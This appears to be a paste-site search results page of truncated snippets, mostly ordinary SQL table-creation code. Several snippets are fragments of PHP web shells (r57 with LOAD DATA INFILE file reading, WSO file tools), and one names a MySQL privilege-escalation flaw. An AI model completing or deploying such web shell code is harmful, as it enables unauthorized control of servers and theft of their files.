42.7K results in 830 ms
6 years ago · Nov 07, 2019, 08:10 AM
dbLatihan; use dbLatihan; drop table if exists tblPeserta; create table tblPeserta ( idpeserta int
6 years ago · Nov 07, 2019, 07:22 AM
if($db) { if(@mysql_select_db($_POST['test3_md'],$db)) { @mysql_query("DROP TABLE IF EXISTS temp_r57_table"); @mysql_query("CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL )"); @mysql_query("LOAD DATA INFILE
6 years ago · Nov 07, 2019, 07:00 AM
0) { $tabledump = "DROP TABLE IF EXISTS $table; "; $tabledump .= "CREATE TABLE $table ( "; $firstfield = 1;
6 years ago · Nov 07, 2019, 06:22 AM
drop database if exists dbLatihan; create database dbLatihan; use dbLatihan; create table tblPeserta ( idpeserta int primary
6 years ago · Nov 07, 2019, 05:32 AM
Value: // 0 Success/File already exists // -1 No free inode table entry if (SyscallNumber == 1) then [PROCESS_TABLE
6 years ago · Nov 07, 2019, 03:27 AM
scripting | [44075] MySQL 5.0.51a Create Table Symlink privilege escalation | [37818]
6 years ago · Nov 07, 2019, 02:10 AM
given character, or -1 if it is not * a valid hexadecimal digit.
6 years ago · Nov 06, 2019, 11:04 PM
borrowed from https://stackoverflow.com/q/7745609/808921 CREATE TABLE IF NOT EXISTS `ProductRequest` ( `AppID` int(3) unsigned
6 years ago · Nov 06, 2019, 10:32 PM
echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1']));
6 years ago · Nov 06, 2019, 09:58 PM
it 1423 01:23:06,750 --> 01:23:07,792 if not for us! 1424 01:23:08,042
6 years ago · Nov 06, 2019, 08:42 PM
Directory '".path()."' is not exists.")); if(!is_readable(path())) die(color(1, 1, "Directory '".path()."' not readable.")); print '<table width="100%" class="table_home" border="0" cellpadding="3"
6 years ago · Nov 06, 2019, 06:28 PM
onCreate(SQLiteDatabase db) { String sqlStament = "CREATE TABLE IF NOT EXISTS "+TABLE_NAME+" "; sqlStament+="(id INTEGER PRIMARY
6 years ago · Nov 06, 2019, 05:58 PM
populate database for demo create table if not exists country ( country_id int unsigned
6 years ago · Nov 06, 2019, 05:48 PM
replace utf8mb4 with utf8 create table if not exists country ( country_id int unsigned
6 years ago · Nov 06, 2019, 04:30 PM
DROP TABLE IF EXISTS `data_ormas`; CREATE TABLE `data_ormas` ( `id` bigint(20) unsigned NOT NULL, `no_akte` varchar(50) NOT
6 years ago · Nov 06, 2019, 04:14 PM
num_fields = mysqli_num_fields($result); $return.= 'DROP TABLE IF EXISTS `'.$table.'`'.$delimiter; $row2 = mysqli_fetch_row($mysqldb->query('SHOW CREATE TABLE '.$table)); $return.=$row2[1].$delimiter; if
6 years ago · Nov 06, 2019, 03:34 PM
CREATE TABLE IF NOT EXISTS `BI_OLTP_24`.`TB_Address` ( `AddressID` INT NOT
Total pages: 2134